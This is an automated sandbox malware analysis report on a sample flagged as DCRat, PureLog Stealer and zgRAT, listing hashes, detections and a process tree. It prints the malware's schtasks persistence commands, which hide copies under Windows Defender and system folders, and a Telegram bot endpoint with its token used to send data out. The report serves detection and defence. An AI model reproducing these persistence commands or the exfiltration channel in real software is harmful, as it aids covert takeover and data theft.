Edit tour

Windows Analysis Report
Etqq32Yuw4.exe

Overview

General Information

Sample name:	Etqq32Yuw4.exe renamed because original name is a hash value
Original sample name:	0f52130d0a1abbe40d9f582b1f95a3e3.exe
Analysis ID:	1582915
MD5:	0f52130d0a1abbe40d9f582b1f95a3e3
SHA1:	beb72e7dccfbfe80868ab9ba16b866a26d5b75d9
SHA256:	c0ecc22a4cc8ef912b7d1de3dd48c9dc32ca053535aa71da572aeb6f9c91d4ae
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Etqq32Yuw4.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\Etqq32Yuw4.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

schtasks.exe (PID: 7584 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7608 cmdline: schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7632 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7656 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7680 cmdline: schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7704 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7728 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7752 cmdline: schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7776 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7804 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7876 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\CbsTemp\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7900 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\CbsTemp\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\CbsTemp\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7948 cmdline: schtasks.exe /create /tn "Etqq32Yuw4E" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /tn "Etqq32Yuw4" /sc ONLOGON /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7996 cmdline: schtasks.exe /create /tn "Etqq32Yuw4E" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7244 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6036 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 2140 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

Etqq32Yuw4.exe (PID: 2256 cmdline: "C:\Users\user\Desktop\Etqq32Yuw4.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

Etqq32Yuw4.exe (PID: 8056 cmdline: C:\Users\user\Desktop\Etqq32Yuw4.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

Etqq32Yuw4.exe (PID: 8068 cmdline: C:\Users\user\Desktop\Etqq32Yuw4.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

gmRWetzDcocJEC.exe (PID: 8076 cmdline: "C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

gmRWetzDcocJEC.exe (PID: 8084 cmdline: "C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

System.exe (PID: 8104 cmdline: C:\Windows\CbsTemp\System.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

System.exe (PID: 8116 cmdline: C:\Windows\CbsTemp\System.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Etqq32Yuw4.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
Etqq32Yuw4.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\CbsTemp\System.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\CbsTemp\System.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\CbsTemp\System.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\CbsTemp\System.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\CbsTemp\System.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\CbsTemp\System.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1741585863.0000000012D90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000000.1654752792.0000000000842000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Etqq32Yuw4.exe PID: 7500	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Etqq32Yuw4.exe PID: 8056	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.Etqq32Yuw4.exe.840000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.Etqq32Yuw4.exe.840000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Etqq32Yuw4.exe.12dac1d8.6.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T21:06:12.119572+0100	2803305	3	Unknown Traffic	192.168.2.4	49731	34.117.59.81	443	TCP

Joe Security ANOMALY Telegram Send Photo

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T21:06:13.556180+0100	1810009	1	Potentially Bad Traffic	192.168.2.4	49732	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="0d1016a9-b6d2-4447-b2c3-ce9150ecfb94"Host: api.telegram.orgContent-Length: 87332Expect: 100-continueConnection: Keep-Alive

Source: Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: Etqq32Yuw4.exe, 00000000.00000002.1738185125.0000000002E77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Etqq32Yuw4.exe, 00000000.00000002.1738122582.0000000002BF2000.00000002.00000001.01000000.00000000.sdmp, Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp, TnWHzEjm.log.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX
Source: Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: Etqq32Yuw4.exe, 00000000.00000002.1738122582.0000000002BF2000.00000002.00000001.01000000.00000000.sdmp, Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, TnWHzEjm.log.0.dr	String found in binary or memory: https://ipinfo.io/country
Source: Etqq32Yuw4.exe, 00000000.00000002.1738122582.0000000002BF2000.00000002.00000001.01000000.00000000.sdmp, Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, TnWHzEjm.log.0.dr	String found in binary or memory: https://ipinfo.io/ip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File created: C:\Windows\CbsTemp\System.exe	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File created: C:\Windows\CbsTemp\System.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File created: C:\Windows\CbsTemp\27d1bcfc3c54e0	Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 0_2_00007FFD9B7D0D48	0_2_00007FFD9B7D0D48
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 0_2_00007FFD9B7D0E43	0_2_00007FFD9B7D0E43
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 19_2_00007FFD9B7F0D48	19_2_00007FFD9B7F0D48
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 19_2_00007FFD9B7F0E43	19_2_00007FFD9B7F0E43
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B7D0D48	21_2_00007FFD9B7D0D48
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B7D0E43	21_2_00007FFD9B7D0E43
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B7E0000	21_2_00007FFD9B7E0000
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B8012E5	21_2_00007FFD9B8012E5
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B80D455	21_2_00007FFD9B80D455
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 22_2_00007FFD9B810000	22_2_00007FFD9B810000
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 22_2_00007FFD9B800D48	22_2_00007FFD9B800D48
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 22_2_00007FFD9B800E43	22_2_00007FFD9B800E43
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B7F0000	23_2_00007FFD9B7F0000
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B8112E5	23_2_00007FFD9B8112E5
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B81D46C	23_2_00007FFD9B81D46C
Source: C:\Windows\CbsTemp\System.exe	Code function: 24_2_00007FFD9B800D48	24_2_00007FFD9B800D48
Source: C:\Windows\CbsTemp\System.exe	Code function: 24_2_00007FFD9B800E43	24_2_00007FFD9B800E43
Source: C:\Windows\CbsTemp\System.exe	Code function: 24_2_00007FFD9B831333	24_2_00007FFD9B831333
Source: C:\Windows\CbsTemp\System.exe	Code function: 24_2_00007FFD9B83D455	24_2_00007FFD9B83D455
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B810000	29_2_00007FFD9B810000
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B800D48	29_2_00007FFD9B800D48
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B800E43	29_2_00007FFD9B800E43
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B831333	29_2_00007FFD9B831333
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B83D455	29_2_00007FFD9B83D455

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\GxFitJjJ.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: Etqq32Yuw4.exe, 00000000.00000000.1654921477.0000000000A2A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 00000000.00000002.1738122582.0000000002BF2000.00000002.00000001.01000000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 00000013.00000002.1817051312.00000000033D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 00000013.00000002.1817051312.0000000003421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 00000014.00000002.1833759154.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 00000014.00000002.1833759154.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 00000014.00000002.1833759154.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 00000014.00000002.1833759154.0000000002D12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 0000001D.00000002.1881183739.0000000002861000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 0000001D.00000002.1881183739.0000000002822000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 0000001D.00000002.1881183739.0000000002811000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe, 0000001D.00000002.1881183739.00000000028D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe
Source: Etqq32Yuw4.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Etqq32Yuw4.exe

Source: Etqq32Yuw4.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Etqq32Yuw4.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gmRWetzDcocJEC.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gmRWetzDcocJEC.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gmRWetzDcocJEC.exe1.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: System.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Etqq32Yuw4.exe, iFDD54ewNgBevy6tYHv.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Etqq32Yuw4.exe, iFDD54ewNgBevy6tYHv.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Etqq32Yuw4.exe, iFDD54ewNgBevy6tYHv.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Etqq32Yuw4.exe, iFDD54ewNgBevy6tYHv.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@34/26@2/2

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

File created: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe

Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

File created: C:\Users\user\Desktop\pZhlLBKs.log

Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\fontdrvhost
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

File created: C:\Users\user\AppData\Local\Temp\qrXWXdvzxq

Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"

Source: Etqq32Yuw4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Etqq32Yuw4.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Etqq32Yuw4.exe

ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

File read: C:\Users\user\Desktop\Etqq32Yuw4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Etqq32Yuw4.exe "C:\Users\user\Desktop\Etqq32Yuw4.exe"
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\en-GB\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
